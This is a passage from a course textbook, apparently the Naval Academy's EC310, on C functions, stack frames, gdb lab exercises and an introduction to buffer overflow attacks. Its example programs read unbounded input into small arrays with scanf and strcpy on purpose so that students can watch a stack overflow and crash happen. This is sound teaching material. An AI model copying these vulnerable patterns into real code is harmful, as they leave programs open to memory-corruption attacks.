arguments are the inputs to a function. A value / parameter / argument is a placeholder that “stands in” for a value / parameter / argument. The result from a function is called the return value / function call / prototype. Practice Problem 6.2 What is the primary purpose of a function in a programming language (i.e., why are they used)? Solution: 141 Practice Problem 6.3 Explain the error made during the call to the addthendisplay() function below. #include<stdio.h> void addthendisplay( int first_num, int second_num ) { int sum_of_num = first_num + second_num; printf("\nThe sum of the numbers is: %d\n\n", sum_of_num); } int main() { int num1 = 27, num2 = 34, num3 = 13; addthendisplay( num1 , num2 , num3 ); } Solution: The way that functions are handled by the CPU is the last piece that we need before understanding an important attack called the buffer overflow attack. Would you believe that the way functions are handled by the CPU can, in the words of an infamous hacker, “produce some of the most insidious data-dependent bugs known to mankind.” Put another way, these functions intended to help us can open the door to allow your computer to be hijacked. 2. The Stack 2.1. A Program in Memory. Let’s think about what happens when a program is loaded into memory. Recall that the source code that we write is translated into machine language instructions, and these machine language instructions are fetched, decoded, and then executed, one-by-one. So… you would surely agree that the program itself must reside in main memory. When the operating system executes a program, it allocates a block of memory for the machine language code that comprises the program. This section of memory is termed the text segment. When the program is placed in the text segment, additional adjacent memory is given to the program to hold the values that it needs to successfully execute (e.g., values of variables). As we have mentioned, this section is called the stack. 2.2 The Stack during a Function Call. Let’s look at an example of how the previous program would run in memory. For this first example, we will make some simplifying assumptions: We’ll look at source code instead of object code We’ll assume everything (an instruction, a stored character, a stored integer, etc.) consumes one address. 142 So, let’s suppose the program is loaded as shown below. The program starts here. The stack All programs begin execution at main. So, when execution begins, the eip register (the instruction pointer) holds the address of the next instruction to be executed: 0x080483c3 This specific instruction is fetched, decoded and executed, and the eip register is then incremented so that it points to the next instruction. (Actually, this incrementing occurs after the fetch, but before the decode and execute.) As the program executes, this process (fetch, increment eip, decode the fetched instruction, execute) is repeated. Early on in the program we declare variables x and y. Space has to be allotted for these variables. This is where the stack comes in! These variables are stored on the stack. The stack Also, since we are calling a function and passing a value, the argument for the function is stored in memory. Since, in this program, we are passing the value of the variable x , the compiler will copy the value of the variable x and store it in memory. In this program, the name of the copied value is number. So, now our picture looks like this: 143 The stack Recall that two important registers—ebp and esp—are used to keep track of the location of the stack in memory. The stack pointer register, esp, points to the memory address at the top of the stack. The base register ebp points to the memory location at the bottom (the base) of the stack—literally, the very next address after the bottom variable. So, our picture looks like this: The stack The program continues to run along, line by line, until 0x080483c8 is reached. At this point we are in trouble because we have to jump to an instruction that is not in order. The next instruction is at memory location 0x080483b5. Consider the difficulty the CPU now encounters: We go to a different function (Abs_Val) that has its own variables We have to know where to jump back to when the function Abs_Val is done. We certainly don’t want to lose main’s variables when Abs_Val is done So, here is what we do. Each function that is called gets its own section of the stack to work with, called its stack frame. So, for the stack frame for main , at this point in time, comprises addresses 0xbffff7d7 – 0xbffff7d9 Now, we are going to give Abs_Val a stack frame for it to use for its own variables. After we are done executing the function Abs_Val , we will go back to the main function, and it will go back to using main's own stack frame. Now, think about this, if we are going to give Abs_Val a stack frame to play with, what information will we need to restore the situation to the way it was before Abs_Val was called? To restore things to the way they were before, we need The proper return address for eip The prior value of the base pointer ebp How should we “remember” these values? By placing these two items in the stack frame for the main function: The stack 144 Now, we can safely jump to the function Abs_Val. This function has one variable, so the stack now looks like this: The stack What happens when we reach the return statement in the function Abs_Val? At that point we restore the stack frame for main. But… how do we do that? Easy! We know where to reset esp (the stack pointer): In the picture above, we can reset esp to be ebp + 2. We know what instruction address should be placed in eip: + 1 into eip. In the picture above, we place the value stored in address ebp We know where to reset ebp (the base pointer): In the picture above, we reset ebp to the value pointed to be ebp. In this case, ebp points to the value of 0xbffff7da, so we reset ebp to point to address 0xbffff7da. Practice Problem 6.4 Place the following elements in the order the will appear (from bottom to top) on the stack during a function call from main (while executing the instructions for that function). • • • • • Return Address main’s Variables Function’s Variables Saved value of prior ebp Function’s Arguments Solution: 145 Practice Problem 6.5 (a) Given the following source code and debugger output, construct the stack frame for the function main in the diagram below part b. Show where the base pointer (label as EBP-Main) and stack pointer (label as ESP-Main) are pointing to, and show where the arguments to exam_function are stored in memory. #include<stdio.h> void exam_function( int x, int y, int z) { int some_class; int best_class; int my_class; best_class = x; my_class = z; some_class = y; } int main() { exam_function( 2005, 2003, 2015 ); } (b) Using your answer from part a), and the additional debugger output below, construct the stack frame for the function exam_function. Show the location of the base pointer (label as EBP-Exam) and stack pointer (label as ESP-Exam) on the figure. Note on your figure: • the location of best_class, some_class, and my_class • the location of the return address • the location of the prior value of the base pointer (EBP-Main) 146 Solution: Address BFFFF7E8 BFFFF7EC BFFFF7F0 BFFFF7F4 BFFFF7F8 BFFFF7FC BFFFF800 BFFFF804 BFFFF808 BFFFF80C BFFFF810 BFFFF814 BFFFF818 BFFFF81C BFFFF820 Value Description 147 148 Problems 1. Consider the program below which uses a user-defined function named maximum that returns the largest of three numbers. A screen capture of how the program should appear is also shown. Your job: Fill in the three missing blanks! #include<stdio.h> float maximum(float x, float y, float z) { float max; if( { ) max = x; } else { max = y; } if( z > max ) { ; } return ; } int main() { float number1, number2, number3; printf("Enter three numbers and I will tell you the largest: "); scanf( "%f %f %f" , &number1 , &number2 , &number3 ); printf("The largest is %f \n", maximum(number1, number2, number3) ); } 2. NOTE ABOUT THIS PROBLEM: Although this problem reads sort of like a tutorial (i.e., “type these commands, then answer these questions”) it’s critical to note that the tutorial aspect of this problem is incomplete. That is, you’ll need to type in additional commands at various points, beyond what’s given, in order to be able to answer the questions. Look to Security Exercise 6 for inspiration. There are different ways to go about getting the answers to this question, but gdb commands such as list, disass main, disass test_function, nexti, and/or x/10xb $esp (where “10” would be replaced by the number of stack frame bytes - starting at the top of the stack - that you wish to view) may come in handy. Carefully enter the following C program void test_function( int a, int b, int c, int d, int e) { int flag; char buffer[ 10 ]; Note: One blank line! flag = 1234 buffer[ 0 ] buffer[ 1 ] buffer[ 2 ] ; = 'U' ; = 'S' ; = 'A' ; } int main( ) { test_function( 5, 6, 7, 8 , 9 ) ; } 149 (a) Compile your program by entering gcc –g followed by the name of your C program (e.g.: if you named your program hwk6.c, you would enter gcc –g hwk6.c ). Then start the debugger by entering: gdb –q ./a.out set dis intel Now, we want to run the program up to the call to test_function – that is, the breakpoint should correlate with the line that reads test_function( 5, 6, 7, 8 , 9 ), which should be 13 if the program was entered exactly as shown above. So, enter break 13 run Sketch a picture of the stack frame for main, showing where the base pointer and stack pointer are pointing to, and show where you believe the arguments to test function will be are stored in memory. Then, enter a second breakpoint: break test_function continue and identify where the arguments to the test function are actually stored in memory (i.e., where the values 5, 6, 7, 8 and 9 are stored in memory). Were you correct? (b) Run the program up to the point of reaching the closing brace of test_function. To do this, enter: break 10 continue Sketch the contents of the stack frame for test_function as well as the additional memory locations below the base pointer. Use the figure on the next page. Show the location of the base pointer and stack pointer on your figure. Note on your sketch: the location of flag the location of buffer the location of the return address the location of the prior value of the base pointer ebp_main 150 3. Of the four choices below (a, b, c or d), select the most appropriate function definition to replace the commented line in the program. #include<stdio.h> //YOUR ANSWER HERE// { float c_sq = a * a + b * b; return c_sq; } int main() { float answer; answer = hypot( 7.12 , 6.37); printf(“The square of the hypotenuse is: %f\n”, answer); } (a) (b) (c) (d) 4. float hypot(float a, float b, float c) float hypot(int a, int b) void hypot(float a, float b) float hypot(float a, float b) Sketch the contents of the stack frame for main under the column labeled Data in hexadecimal. Locate and label the base pointer as ebp_main and the stack pointer as esp_main under Stack Frame Info. Locate and label the variables g, fox[0], fox[1] under What is Represented. (Note: Not every block in the table will be filled in.) #include<stdio.h> int main() { char fox[2]; fox[0] = 'B'; fox[1] = 0; int g = 17; } Address: 0xBFFFF810 Data: What is Represented: 0xBFFFF811 0xBFFFF812 0xBFFFF813 0xBFFFF814 0xBFFFF815 0xBFFFF816 0xBFFFF817 0xBFFFF818 151 Stack Frame Info: 152 Security Exercise 6 Part 1. Initial Setup Today you will use the program sx6.c which has been written for you and placed in the ec310code directory. Copy this file to the work directory by carefully entering the following at the home directory prompt: midshipman@EC310:~ $ cp ec310code/sx6.c Make sure you are at your home directory! If you fear making anyone mad, then you ultimately probe for the lowest common denominator of human achievement. And, by the way, who am I? work Enter this! Verify that you have sx6.c in your work directory by changing to the work directory: cd work and then listing the files in the work directory: ls If you do not have sx6.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2. Part 2. Our Program for Today Look at the program sx6.c using nano. The program sx6.c is shown below: void test_function( int a, int b, int c, int d) { int flag; char buffer[ 10 ]; flag = 31337; buffer[ 0 ] = ‘A’ ; } int main( ) { test_function( 1, 2, 3, 4 ) ; } Note that to make this first exploration of the stack as simple as possible, we did NOT include the line #include<stdio.h> in our program. 12 This is okay, since we do not use any input (scanf) or output (printf) statements. Note that this program produces no output. It truly is a useless program… but it’s simple enough to explore the stack for the first time. Question 1: How many functions are in the program? 12 This program is a very slightly modified version of the program named stack_example.c from page 71 of the Erickson text. We have modified the layout of the braces to the form we are familiar with. 153 Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using gcc –g sx6.c and then run your program ./a.out to confirm it executes without errors. (The program does not produce any output—you are just making sure you do not get any error messages.) If your program is not working STOP and ask your instructor for help. Otherwise, proceed to Part 3. Part 3. The Two Functions in Memory Question 2: Note that the function named test_function is passed four arguments: 1, 2, 3 and 4. How much memory (in bytes) does each of these four arguments need? Question 3: How much memory (in bytes) is needed to store test_function ‘s flag variable? Question 4: How much memory (in bytes) is needed to store test_function ‘s array named buffer? Let’s examine how the main function is stored in memory. Enter: gdb –q ./a.out set dis intel disass main You should see this: Recall that the assembly language code above corresponds to the main function, repeated below: int main( ) { test_function( 1, 2, 3, 4 ) ; } Question 5: Where in main memory is the first instruction that starts the main function? 154 Now let’s examine how the function named test_function is stored in memory. Enter: disass test_function You should see this: Question 6: Where in main memory is the first instruction that starts the function named test_function? So…what’s really going on? To answer this, we will look at the stack frame for each of our two functions. Onward to Part 4! Part 4. The Stack Frame for main Let’s set a breakpoint in main right before the call to test_function. Enter the following commands: list main break 11 This is line 11. So, the command run break 11 You should see: Question 7: will run our program to the point of this line (but not including this line!). That means that our program will pause right before the call to the function named test_function. What address is stored in the instruction pointer (i.e., the eip register)? Go back to the assembly code for main (shown on the preceding page). Question 8. Based on your answer to question 7, what is the assembly language instruction that the instruction pointer is pointing to? Is this still in the main function? So, let's start looking at the stack! Recall that the stack is the area in main memory that the program has available to store any values that it needs for successful execution (such as variables, arguments, important addresses, etc.). The active part of the stack is bounded by the two registers esp and ebp. 155 Question 9: What are the addresses stored in the stack pointer (esp) and the base pointer (ebp) ? Question 10. Considering the values of esp and ebp, how many bytes are in this stack frame? (Hint: you must remember that these values are in hexadecimal! Recall that esp points to the first address in the stack frame and ebp points to the first address after the stack frame. Thus, subtracting the address pointed to by esp from the address pointed to by ebp provides the number of bytes in the stack frame.) Question 11: In the picture of memory shown on your answer sheet, note that the base pointer points to the bottom of the stack. Fill in the addresses next to each byte (for ease, you may, if you wish, label only the last four hexadecimal digits of each address). Indicate on the diagram where the stack pointer is pointing to. Now, looking at where the instruction pointer is pointing to, the next four instructions that should be executed are (but don’t actually execute these just yet): mov mov mov mov DWORD DWORD DWORD DWORD PTR PTR PTR PTR [esp+12],0x4 [esp+8],0x3 [esp+4],0x2 [esp],0x1 In English, the first of these instructions says: Place the value 4 in the memory location given by esp + 12 (i.e., the stack pointer + 12). Note that the 12 in this case is given in base-10. Similarly, the second of these instructions says: Place the value 3 in the memory location given by esp + 8 (i.e., the stack pointer + 8). Note that the 8 in this case is given in base-10. Question 12: Modify the diagram shown in Question 11 to show what the stack should look like after these four instructions are executed. Remember that an integer (such as 4) takes up four bytes. Enter nexti four times to execute these four assembly language instructions. Now, examine the stack to see if the picture you drew in Question 12 is correct. 156 Examine the stack? How do we do that? Well, to examine the word stored at the address contained in the stack pointer, we can enter: x/xw $esp To examine the word stored at the address four bytes later, we can enter: x/xw $esp + 4 And so forth. As an alternative, you could use x/xw followed by the address you want to examine. For instance, to examine the word that is stored at the address 0xbffff80c I would enter: x/xw 0xbffff80c. Show your instructor your answer to Questions 11-12. If you are on the right track, you will be told to move on to Part 5! Part 5. The Stack Frame for test_function So, we will soon jump to the function named test_function. As we discussed in lecture, this will establish a new stack frame. After the function named test_function is done, we have to be able to return to main's stack frame. To return to the main function, main must save on the stack: The proper return address for eip The prior value of the base pointer ebp Let's first establish what these values should be. Question 13: What is the old (prior) value of the base pointer that must be saved on the stack? Look carefully at the assembly language code for main shown on back in Part 3 of this Security Exercise. Question 14: What is the value of the return address that we must save, so that the instruction pointer can be reset back to the correct line of code after the function call to test_function is complete? Let's jump into the function named test_function. Enter: list test_function break 8 continue You should see: 157 Notice that by inserting a breakpoint at line 8, we are within (but at the end of) test_function. Question 15: What address is stored in the instruction pointer (i.e., the eip register)? Question 16. Based on your answer to Question 15, what is the assembly language instruction that the instruction pointer is pointing to (i.e., the next instruction that will execute, but has not yet executed)? Question 17: What are the addresses stored in the stack pointer (esp) and the base pointer (ebp) ? Question 18. Considering the values of esp and ebp, how many bytes are in this stack frame? (Hint: you must remember that these values are in hexadecimal!) Show your instructor your answer to Questions 17-18. If you are on the right track, you will be told to move on to Part 6! Part 6: Do you have the skills of a hacker? Now you will be put to the test! Have you developed hacking skills? Let’s see! Question 19: Using all the skills you have learned so far, attempt to determine the contents of the stack frame for test_function as well as the additional memory locations below the base pointer. Fill in your answers on the picture for Question 19. The arrow on the figure shows where you should place the base pointer (ebp). All other info should be based upon anchoring the base pointer at the location shown. Specifically: Show the address for each byte (last four hex digits) where is flag? (Hint: convert the value to hexadecimal) Where is buffer? (Hint: You should hunt for buffer[0] ) Where is the return address (see your answer to Question 14)? Where is the old value of the base pointer (see your answer to Question 13)? 158 Security Exercise 6 Answer Sheet Name: __________________ Question 1: Question 2: Question 3: Question 4: Question 5: Question 6: Question 7: Question 8: Question 9: Question 10: Question 11 and Question 12: Address Value stored 159 Question 13: Question 14: Question 15: Question 16: Question 17: Question 18: Question 19 is on the next page. 160 Address Value stored 161 162 Chapter 7: The Buffer Overflow Objectives: (a) Describe the buffer overflow attack, determine what features of C make it possible, and identify who is responsible for memory management in C. (b) Demonstrate the ability to craft simple buffer overflow exploits (c) Explain how specific buffer overflow attacks work by describing stack operations. (d) Analyze programs that submit input via the command line. 1. The Buffer Overflow Attack 1.1. Introduction The very first major attack on DoD computer networks took place in February of 1998 and lasted for over a week. The hackers gained administrative (i.e., “root”) access on UNIX machines at 7 Air Force sites and 4 Navy sites, gaining access to logistical, administrative and accounting records. The method used in this early attack—a buffer overflow—has been used countless times ever since. Many famous attacks—the Morris Worm, the Code Red Worm, the SQL Slammer Worm, the Twilight Hack, Blaster, Conficker—used the buffer overflow as a primary attack vector. The recent Stuxnet worm used the buffer overflow as one of many attack vectors. The buffer overflow attack is still exceedingly common. An examination of a two-week period in early January 2014 proves the point. On January 3, 2014, the SANS Institute reported a newly discovered buffer overflow attack against the ubiquitous Linksys router. On January 9, 2014 a buffer overflow exploit was discovered in the “X Window” system that underpins many Linux desktops—although discovered in January 2014 this bug was waiting around to be discovered for the previous 22 years! On January 15, 2014, a penetration testing firm announced the discovery of a zero-day flaw for executing a buffer overflow attack on a common SCADA system used in the US, the UK and Australia. A security researcher described the potential ramifications of this latter attack as “the stuff of modern-day nightmares.” To be sure, the buffer overflow attack is not the only way to cripple a computer system. There are many other ways to attack, such as cross-site scripting, SQL injection, format string errors, and on and on. You may have learned in SI110 that the Department of Homeland Security worked together with the SANS Institute, Apple and Oracle back in 2011 to develop a list of the top 25 software vulnerabilities, and the “classic buffer overflow” came in third, behind SQL injection and OS command injection (cross-site scripting was 4th). The buffer overflow was the top vulnerability from 2000 through 2005, and has bounced around the top three spots ever since. In February 2013, the security firm Sourcefire surveyed Common Vulnerability Scoring System (CVSS) data from 1988 to 2012, and found that buffer overflows were the most-often reported vulnerability. Of the vulnerabilities assigned a category of “high severity”, buffer overflows comprised over a third of the total. Security analyst Paul Roberts notes that “the stubborn staying power of buffer overflows for more than two decades – despite gallons of industry ink spilled on the problem – is dispiriting and has to get us thinking about what it is we’re doing wrong as an industry.” 1.2. In a Nutshell. The simple basis for the attack can be appreciated by examining the following section of C code: int k = 1000 ; char my_stuff[ 512 ] ; my_stuff[ k ] = 'A'; What happens if this code is executed? This array is only allotted 512 bytes; i.e., this array holds character variables my_stuff[0] through my_stuff[511]. The programmer who wrote the third line of code seems unaware that the last element of the array is my_stuff[511], since this third line of code assigns a value to the non-existent variable named my_stuff[1000]. When this code is executed, a byte of memory 488 bytes beyond the end of the array will be overwritten with the character 'A'. This error will not be caught at compile-time. In a nutshell, the problem is that C compilers do not check for going beyond the bounds of an array. 163 This is a big concern because almost all major operating systems are written in C. Additionally, many popular applications are written in C. You might be wondering: What exactly happens when the code above is run? The unfortunate answer is: Who knows? Perhaps nothing noticeable will occur. Perhaps disaster will occur. Practice Problem 7.1 What feature of the C language makes a buffer overflow attack possible? Solution: 1.3. Back to the Stack Recall that when a program is to be executed, the operating system reserves a block of main memory for it. The “text” segment holds the actual program (the machine language instructions which we can view as assembly-language instructions.) The memory allotted to the program in the text section does not change; it does not shrink or grow, since the program does not shrink or grow while it is being executed. The “stack” is the memory that the program has available to store information during execution. For example, the program’s variables are stored on the stack. Let’s look at the program on the right, and examine the stack as it executes. 164 The program begins at the main function, and the variables that are used by the main function are placed on the stack. When the instruction pointer is at the location shown below on the right, the stack appears as on the left. Recall that we keep track of the stack using the base pointer (ebp) which points to the bottom of the stack (specifically the memory location immediately following the bottom of the stack) and the stack pointer (esp) which points to the top of the stack. Each function gets to place its variables on the stack. The part of the stack that belongs to a function is called that function’s stack frame. So, the picture above depicts the current stack frame for the main function. Now, the next instruction has us call the function named happy_times. The values of the arguments are placed on the stack in preparation for the function call. The stack, before the function call, now looks like this: The function happy_times also has a variable (the array named alpha_code) and it needs to be allotted its own (separate) stack frame. But after happy_times are over 13, we will jump back to the main function. So, we still need to keep the stack 13 Of course happy times are never over at USNA…. 165 frame for main undisturbed. Additionally, after happy_times are over, we need to resume program execution at the correct point (i.e., the point in main where we left off when we reached the function call). So… what do we do? We place the return address for the next instruction after the function call on the stack, and the old value of the base pointer on the stack, then we allot space for happy_times’ variable as shown below. Recall from last lecture that in a function call from main to another function, the stack will be organized as: An Aside Note that our example conforms to this organization, as it must. Now, suppose that the function happy_times , as part of its code (shown as “more code” above), prompts the midshipman to enter his alpha code. The function happy_times uses the character array named alpha_code to hold the value that the midshipman types in. We have seven bytes reserved on the stack for the alpha number (remember, we need the NULL terminator). If all works well, all well and good. And everything always works well at USNA. Right? Of course not! Our midshipman was sleepy, and when he was prompted to enter his alpha code (which happens to be 151234) he dozed off for a micro-nap and accidentally entered: 1512344444444444444444444 <enter> He entered a total of 25 characters. Think about this. What happens? 166 When the 25 characters are fed into the array alpha_code, the typed-in characters beyond the seventh will start overwriting memory! It may be the case that the alpha code overwrites the return address. Suppose this occurs. What will happen when function happy_times is finished executing? If the return address was indeed overwritten, then the return address will consist of some of the characters that were in the midst of the alpha string that was entered. What will happen then? The instruction pointer will jump to some spurious address. And then... the program will most likely crash with a segmentation fault. A segmentation fault occurs when a program attempts to access memory outside the region of main memory that it has been allotted. This sequence of events, if done intentionally, is called a buffer overflow attack or a stack smashing attack!!! Practice Problem 7.2 Describe the mechanism by which a segmentation fault occurs. Solution: 2. A More Malicious Buffer Overflow Attack 2.1. The Buffer Overflow Attack on Steroids Our sleeping midshipman was not trying to do anything malicious—he just fell asleep like all midshipmen do. But how could this fundamental problem with C described above be exploited to do something truly evil? Suppose I: Chose an alpha code that was not really an “alpha code”... …heh, heh… …but was instead a valid machine language program. 167 So, now, the hacker has placed a program into memory: But how can the hacker make use of this program? Think about this: Suppose that when the hacker types in his executable code, he takes care to carefully overwrite the return address, so that the four bytes that previously held the correct return address are changed to contain the address of alpha_code! In this case, the return address is the address of the start of the evil program that the hacker has just placed in memory! Consider the effect of this action. When function happy_times is done, the "return address" will be placed in the eip register. But the return address was adjusted to be the start of the executable program that has been surreptitiously placed in memory. So, the hacker’s program will start executing. In summary, the hacker has placed his own program in memory and made it execute. The hacker has executed a buffer overflow attack. When examining the potential for a buffer overflow, the programmer should consider how a function's variables are placed on the stack. The first variable encountered is placed on the stack first, the second variable encountered is placed on the stack next (above the first variable) and so forth. Practice Problem 7.3 For the pawn function below, is it possible to overwrite the value you will get for your item with an amount of your choosing by overwriting the value variable on the stack during the scanf( ) call below? Explain. void pawn() { char item[12]; int value = 100; printf(“What have you come to sell? “); scanf(“%s”, item); } int main() { pawn(); } Solution: 168 Practice Problem 7.4 When the echo_string function is called in main from the following code sample, the stack pictured below is created. #include<stdio.h> void echo_string() { int count; char entered_string[10]; printf(“Enter a string: “); scanf(“%s”, entered_string); for(count=0; count < 10; count=count+1) { printf(“%s\n”,entered_string); } } int main() { echo_string(); } Assuming there is no padding (extra spaces) when the frame is created. How many characters can be entered before the return address is overwritten? Solution: 2.2. A Possible Solution: Don't Use C! If this problem exists simply because C compilers do not check for going beyond the bounds of an array, an easy way to solve this problem would be to avoid using the C language altogether. In fact, more modern programming languages such as Java and C# will not allow a programmer to run beyond the bounds of an array. Why not simply abandon C and announce to the world: Problem Solved? We cannot simply abandon C since too many C programs are in circulation. Moreover, programmers would not want to abandon C even if a magic wand could suddenly convert all C legacy code into Java programs! Recall from an earlier lecture that even today, most programmers are programming in C and prefer to program in C. The C programming language is very popular because it executes quickly and it provides the programmer with a high level of control over the program. But with this power comes responsibility: Data integrity in C is the programmer's responsibility. If the responsibility for data integrity were taken away from the programmer and given to the compiler instead, the compiler would consistently and constantly check that we never run beyond the bounds of an array (which is good), but program execution would be much slower (which is bad). Generally, users want their programs (whether they be operating systems, office software, application programs or games) to execute quickly. C executes quickly since the compiler does not verify data integrity. Yet, with the responsibility for data integrity resting on the programmer's shoulders, buffer overflow errors can occur if the programmer is not careful. A good analogy is provided by USNA instructor Nick Rosasco: C is like a workbench with saws and power tools and highvoltage drops and spinning lathes all out in the open, without safeguards and protections. For a master craftsman who knows his job very well, this environment would be ideal for productive work, with the understanding that the craftsman has to be responsible for his safety. For the novice, this environment would be very dangerous. Conversely, a workbench that required the user to constantly interact with multi-level interlocked protection mechanisms and cumbersome safety features would be much safer for the novice, but would drive the skilled craftsman insane. As with work benches, so with programming languages: The intentional lack of safety in C translates into greater flexibility and improved performance… and risk. In order for you to write your own buffer overflow attacks, we have to add a little bit to your C repertoire. For now, we have to cover command line arguments and the exit command. It’ll be fun. 169 3. More Fun with C 3.1. Command Line Arguments. Up to this point, we have written the first line of the function main as int main() However, main is a function that we can pass arguments to. As we already know, main is special, and passing arguments to the main function also takes place in a special way. The main function is more formally written as int main (int argc, char *argv[]) The parameter argc contains the number of arguments passed to main and the variable argv is an array of strings with each argument passed stored in one of the array locations. First, let’s get a little bit comfortable with this notation. If we type in the following program: #include <stdio.h> int main( int argc, char *argv[] ) { int i; printf("Arguments to this program, on the command-line:\n"); for( i = 0; i < argc; i = i + 1 ) printf("%s\n", argv[i]); } then, when executing it we would see the output below: Here is what is happening. When you execute a C program, the operating system counts the total number of separate items entered, and places that integer in the variable argc. Each separate item you entered is placed, as a string, one-by-one, in the array of strings argv. So, if I was to type: ./a.out Then: argv[0]=“./a.out” one 2 3.45 ./a.out argv[1]=“one” one who? 2 3.45 argv[2]=“2” and what is the value of argc? The answer: 5. 170 who? argv[3]=“3.45” argv[4]=“who?” Practice Problem 7.5 For the following program invocation: midshipman@EC310 ~$ ./a.out wait 8 mate (a) What is the value of argc? (b) What is the value of argv[1]? (c) What is the data type of argv[2]? Solution: (a) (b) (c) Practice Problem 7.6 Pertaining to taking in command line arguments for a program, choose the best description for argc . (A) holds the number of command line arguments excluding the program name. (B) holds the total number of command line arguments available to the program. (C) holds the number of integer variables entered at the command line before the program begins. (D) None of the above. Solution: Practice Problem 7.7 In the following sentence, circle the correct choices. argv is a(n) array / index / stack used to store each command line parameter / index / argument in a binary / string / numeric format. Solution: 3.2. The exit statement. Sometimes we would like to intentionally terminate a program “gracefully” (instead of letting the program crash and burn). This can be accomplished with an exit statement. When using the exit statement, we must add the directive: #include<stdlib.h>. An example: #include <stdio.h> #include <stdlib.h> int main() { float x, y; printf( "This program divides x by y \n" ); printf( "Enter x and y: " ); scanf( "%f %f", &x, &y ); if( y == 0 ) { printf( "Divide by 0!\n"); exit(1); //For us, it doesn’t matter what number we use } else { printf( "x/y is %f\n" , x/y); } } 171 172 Problems 1. What features of the C language make a buffer overflow attack possible? 2. Answer the following questions concerning how a program is stored in memory during its execution. 3. (a) Which segment of memory has contents that remain unchanged during program execution? (b) Does the programmer have complete control over how the stack is organized? (c) What is the relationship between the order in which variables appear in a function and the order in which these same variables are stored in the function's stack frame? (d) What important registers are used to define the boundaries of a stack frame? (e) Suppose main calls a function named fun. After all the commands of fun have executed, how does the program know to continue at the exact location in main where it left off? (f) Is a source code file permitted to have more than one function? (g) If your answer to (f) was "no", explain why that is the case. If your answer to (e) was "yes", explain how the operating system knows where to begin executing your program if the source code file contains multiple functions. Segmentation Fault Carefully enter the following program using nano. Notice that the program has no blank lines. #include<stdio.h> void happy_times( int x , int y ) { char alpha_code[ 7 ]; printf("\nEnter your alpha code:" ); scanf( "%s" , alpha_code ); printf("\nYour alpha code is: %s\n\n", alpha_code ); } int main( ) { int a = 77; int b = 21; happy_times( a , b); } Execute the program entering just the numeric portion of your alpha code. You should see something like this: Now, rerun the program entering a ridiculously long alpha code. You should see a segmentation fault: 173 Recall that a segmentation fault occurs if a program attempts to run beyond the boundaries of main memory that the operating system has allotted the program. In this homework problem we will explore in depth the cause of this segmentation fault. Let's run our program (which I've named happy.c) by entering: gcc –g happy.c gdb –q ./a.out set dis intel list main break 13 run nexti nexti nexti nexti Exactly four nexti's If you now enter i r eip you should confirm that the next instruction that will execute is the instruction at address 0x8048419. If you now enter disass main you should verify that the very next instruction is the function call. See the screen capture below. The important point of all this is to note that you are still in main (but just barely!). Recalling the generic picture of the stack, and noting that we have not yet arrived at the function call, the stack should consist just of main's variables and the function's arguments. (a) Our goal is to locate main's variables and the function's arguments on the stack. Recall that main's variables (a and b) will be stored in binary, which we can read as hexadecimal numbers. Convert the values of a and b to hexadecimal 174 and write these values below as eight hexadecimal digits (recall that integers are stored as four bytes, and four bytes equates to eight hexadecimal digits) : Note: For Parts (b) – (i) you will fill in the table which begins at the bottom of the next page. (b) Examine the value of the stack pointer ( i r esp ) and the base pointer ( i r ebp ). Fill in the values in the table below, showing where the base pointer (label as EBP-main) and stack pointer (label as ESP-main) are pointing to. (c) Look at 40 bytes starting at the stack pointer by entering x/40xb $esp You should see: This is the contents of memory location 0xbffff800 This is the contents of memory location 0xbffff801 This is the contents of memory location 0xbffff802 Locate main's variables and the function's arguments on the stack. Fill in the table, annotating the locations of these four values. Label these as (main variable: a), (main variable b), (function argument: x) and (function argument: y). (d) Now enter break 2 continue nexti The program is now at the point where the old value of the base pointer and the correct return address have been placed on the stack. What should be stored as the correct return address? (Hint: enter disass main and determine the address of the next instruction after the function call.) What should be the saved value of the base pointer? (e) Examine the value of the stack pointer ( i r esp ). Fill in the values in the table below, showing the stack pointer's location (label as ESP-main-revised). (f) Look at 40 bytes starting at the stack pointer by entering x/40xb $esp Locate the saved value of the base pointer and the return address on the stack. Fill in the table, annotating the locations of these two items. Label these as (saved base pointer) and (return address). 175 (g) Now enter break 8 continue When prompted to enter your alpha code, enter: AAAAAA Examine the value of the stack pointer ( i r esp ) and the base pointer ( i r ebp ). Fill in the values in the table below, showing where the base pointer (label as EBP-happy_times) and stack pointer (label as ESP-happy_times) are pointing to. (h) Locate your alpha code in the stack frame for happy_times. Do this by examining 40 bytes starting at the stack pointer. Note that the capital letter A is equivalent to hexadecimal 0x41. Fill in the table, annotating the location of the string alpha_code. Note that the NULL that terminates the string is part of the string. (i) Now, examine your memory drawing. How many characters would you have had to enter for your alpha code before you start to overwrite the saved value of the base pointer (remember that the NULL is automatically added)? Overwriting the saved value of the base pointer will (almost always) cause a segmentation fault, because the program will attempt to restore the stack to a location in memory outside the region of main memory given to the program. (j) Exit the debugger (by entering quit) and run your program by entering ./a.out. Enter an alpha code of size equal to the number of characters you calculated in part (i). Did you get a segmentation fault? (You should have!) (k) Enter an alpha code of size one less than the number of characters you calculated in part (i). Did you get a segmentation fault? (You should not have.) Address Value Description Address Value Description BFFFF7CD BFFFF7CE BFFFF7CF BFFFF7D0 BFFFF7D1 BFFFF7D2 BFFFF7D3 BFFFF7D4 BFFFF7D5 BFFFF7D6 BFFFF7D7 BFFFF7D8 BFFFF7D9 BFFFF7DA BFFFF7DB BFFFF7DC BFFFF7DD BFFFF7DE BFFFF7DF BFFFF7E0 BFFFF7E1 BFFFF7E2 BFFFF7E3 176 BFFFF7E4 BFFFF7E5 BFFFF7E6 BFFFF7E7 BFFFF7E8 BFFFF7E9 BFFFF7EA BFFFF7EB BFFFF7EC BFFFF7ED BFFFF7EE BFFFF7EF BFFFF7F0 BFFFF7F1 BFFFF7F2 BFFFF7F3 BFFFF7F4 BFFFF7F5 BFFFF7F6 BFFFF7F7 BFFFF7F8 BFFFF7F9 BFFFF7FA BFFFF7FB BFFFF7FC BFFFF7FD BFFFF7FE BFFFF7FF BFFFF800 BFFFF801 BFFFF802 BFFFF803 BFFFF804 BFFFF805 BFFFF806 BFFFF807 BFFFF808 BFFFF809 BFFFF80A BFFFF80B BFFFF80C BFFFF80D BFFFF80E BFFFF80F BFFFF810 BFFFF811 BFFFF812 BFFFF813 BFFFF814 BFFFF815 BFFFF816 BFFFF817 BFFFF818 BFFFF819 BFFFF81A 4. Given the following code snippet: char first_name[6] = “Alice”; 177 strcpy(first_name, “Alexander”); (a) Will the C compiler state that there is an error? (b) What potentially dangerous situation occurs because of the snippet above? (c) What is the minimum size necessary for the array 